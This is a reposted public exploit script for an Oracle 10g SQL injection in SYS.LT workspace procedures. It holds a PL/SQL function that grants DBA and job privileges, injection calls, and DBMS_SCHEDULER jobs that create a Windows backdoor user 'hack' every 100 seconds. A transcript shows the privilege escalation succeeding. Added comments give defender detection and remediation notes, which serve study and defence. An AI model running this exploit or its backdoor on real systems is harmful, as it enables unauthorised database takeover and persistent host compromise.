Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
来源:http://www.dsecrg.ru 作者:Polyakov 发布时间:2009-01-07
/*********************************************************/ /*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/ /**grant DBA and create new OS user (using scheduller)***/ /*********************************************************/ /***********exploit grant DBA to scott********************/ /***********and execute OS command "net user"*************/ /***********using scheduler*******************************/ /*********************************************************/ /***********tested on oracle 10.1.0.5.0*******************/ /*********************************************************/ /*********************************************************/ /* Date of Public EXPLOIT: January 6, 2009 */ /* Written by: Alexandr "Sh2kerr" Polyakov */ /* email: Alexandr.Polyakov@dsec.ru */ /* site: http://www.dsecrg.ru */ /* http://www.dsec.ru */ /*********************************************************/ /*Original Advisory: */ /*Esteban Martinez Fayo [Team SHATTER ] */ /*Date of Public Advisory: November 11, 2008 */ /*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ /*********************************************************/
-- Baseline: list the roles held by the connected account before anything is run.
-- The identical query is repeated at the end so the two result sets can be diffed;
-- a new DBA row in the second run is the indicator of compromise this writeup aims for.
select * from user_role_privs;
-- Payload function. AUTHID CURRENT_USER plus PRAGMA AUTONOMOUS_TRANSACTION means the
-- GRANTs issued through EXECUTE IMMEDIATE are committed independently of whatever
-- statement evaluates the function. It is never called directly by the attacker:
-- it is spliced as a predicate into the SYS.LT.* calls on the next line, where it
-- presumably executes with the rights of the package owner (the advisory URL in the
-- file header documents the underlying defect and the vendor fix).
-- Defender notes: a CREATE FUNCTION from a non-DBA schema whose body contains
-- EXECUTE IMMEDIATE 'GRANT DBA ...' is a high-fidelity audit signal on its own, as
-- is any change to DBA_ROLE_PRIVS that no administrator session issued.
CREATE OR REPLACE FUNCTION Z return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; EXECUTE IMMEDIATE 'GRANT CREATE ANY JOB TO SCOTT'; EXECUTE IMMEDIATE 'GRANT CREATE EXTERNAL JOB SCOTT'; COMMIT; RETURN 'Z'; END; /
-- Injection vector: the workspace-name argument carries an escaped quote followed by
-- an appended predicate that evaluates SCOTT.Z(). The literal name ('sh2kerr') is
-- arbitrary; the payload is the same for both SYS.LT entry points used here (the
-- session transcript further down uses REMOVEWORKSPACE the same way).
-- Defender notes: a workspace name containing a single quote or a function call is
-- never legitimate, so auditing SYS.LT.CREATEWORKSPACE / COMPRESSWORKSPACETREE /
-- REMOVEWORKSPACE calls for such arguments detects this pattern directly. Where
-- Workspace Manager is not needed, restricting EXECUTE on SYS.LT to the accounts that
-- require it (check DBA_TAB_PRIVS) shrinks the exposed surface until the fix is applied.
exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Z()=''Z'); exec SYS.LT.COMPRESSWORKSPACETREE('sh2kerr'' and SCOTT.Z()=''Z');
/* We create a backdoored OS user "hack" with password 12345 using external jobs */ /* Note that in this method the new user will be created every 100 seconds */ /* so if an administrator finds it and tries to delete it */ /* user hack will be created again. So it is also a simple backdoor */
-- Stage 2 (after the DBA grant): registers a scheduler program of type EXECUTABLE
-- whose action is a Windows shell command (cmd /c "net user ... /add"). This is why
-- the payload function also grants CREATE ANY JOB / CREATE EXTERNAL JOB. The command
-- presumably runs under whatever OS account the database's external-job facility is
-- configured with on the host.
-- Defender notes: rows in DBA_SCHEDULER_PROGRAMS with program_type = 'EXECUTABLE'
-- owned by a non-administrative schema, and local accounts appearing outside change
-- control, are the detection points; the OS account used for external jobs should
-- carry the minimum rights the workload needs.
BEGIN DBMS_SCHEDULER.CREATE_PROGRAM ( program_name=> 'MyCmd', program_type=> 'EXECUTABLE', program_action =>cmd /c "net user hack 12345 /add", enabled=> TRUE); END; /
-- Persistence: the job re-runs the program every 100 seconds (FREQ=SECONDLY;
-- INTERVAL=100), so removing the OS account without first removing the job only buys
-- about 100 seconds -- the job's own comments field says as much.
-- Defender notes: DBA_SCHEDULER_JOBS entries with a short SECONDLY repeat interval
-- bound to an EXECUTABLE program are rare in normal operation. Remediation order
-- matters: disable and drop the job and program, revoke the grants made by the payload
-- function and drop it, and only then remove the OS account.
BEGIN DBMS_SCHEDULER.CREATE_JOB ( job_name=> 'extjobexec', program_name=> 'MyCmd', repeat_interval=> 'FREQ=SECONDLY;INTERVAL=100', enabled=> TRUE, comments=> 'create backdoor user every 100 seconds'); END; /
/* here we can paste any OS command, for example create a new user */
-- Triggers one immediate run of the job instead of waiting for the first scheduled
-- interval. Defender note: manual RUN_JOB invocations on an EXECUTABLE program show up
-- in the scheduler job-run history views alongside the periodic runs.
exec dbms_scheduler.run_job('extjobexec'); /
-- Post-check: same query as at the top of the script; a DBA row that was absent in the
-- baseline confirms the grant inside the injected function took effect.
select * from user_role_privs;
--------------------------------------------------------------------------------- -----------------------------EXAMPLE OF EXPLOITATION ---------------------------- ---------------------------------------------------------------------------------
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
OUTLN                          CONNECT                        NO  YES NO
OUTLN                          RESOURCE                       NO  YES NO
SQL> CREATE OR REPLACE FUNCTION X return varchar2 2 authid current_user as 3 pragma autonomous_transaction; 4 BEGIN 5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN'; 6 COMMIT; 7 RETURN 'x'; 8 END; 9 /
Function created.
SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x')
PL/SQL procedure successfully completed.
SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x')
PL/SQL procedure successfully completed.
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
OUTLN                          CONNECT                        NO  YES NO
OUTLN                          DBA                            NO  YES NO
OUTLN                          RESOURCE                       NO  YES NO
SQL>